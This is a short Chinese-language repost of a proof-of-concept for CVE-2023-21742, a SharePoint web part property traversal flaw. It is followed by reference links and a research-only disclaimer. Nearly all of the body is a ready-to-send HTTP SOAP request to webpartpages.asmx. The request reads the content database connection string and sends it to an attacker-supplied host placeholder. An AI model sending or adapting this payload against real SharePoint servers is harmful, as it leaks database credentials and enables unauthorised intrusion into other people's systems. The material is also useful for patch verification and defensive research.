CVE-2023-21742
概念验证
注意:泄漏属性/属性只是一个 PoC,而不是 RCE EXP。
POST /_vti_bin/webpartpages.asmx HTTP/1.1 Host: splab13 SOAPAction: http://microsoft.com/sharepoint/webpartpages/ConvertWebPartFormat Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Connection: keep-alive Content-Type: text/xml; charset=utf-8 Content-Length: 1733 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ConvertWebPartFormat xmlns="http://microsoft.com/sharepoint/webpartpages"><inputFormat><![CDATA[ <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register TagPrefix="att" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <WebPartPages:WebPartZone id="id00" runat="server"> <ZoneTemplate> <WebPartPages:XsltListFormWebPart id="id01" runat="server"> <XmlDefinitionLink>http://webdb.com/aaaa</XmlDefinitionLink> <DataSources> <att:SoapDataSource runat="server" SelectUrl="http://[host]/pwn"> <SelectCommand> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <leakeddata>{leak}</leakeddata> </soap:Body> </soap:Envelope> </SelectCommand> <SelectParameters> <WebPartPages:DataFormParameter Name="leak" PropertyName="Parent.Controls[1].Controls[0].Web.Site.ContentDatabase.DatabaseConnectionString" DefaultValue="NULL"/> </SelectParameters> </att:SoapDataSource> </DataSources> </WebPartPages:XsltListFormWebPart> <att:TemplateContainer runat="server" id="f01" /> </ZoneTemplate> </WebPartPages:WebPartZone> ]]></inputFormat></ConvertWebPartFormat></soap:Body></soap:Envelope>
参考
- https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-sharepoint-webpart-property-traversal-cve-2022- 38053-cve-2023-21742-bc6931698a5f
- https://nvd.nist.gov/vuln/detail/CVE-2023-21742
原文始发于微信公众号(Ots安全):CVE-2023-21742 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论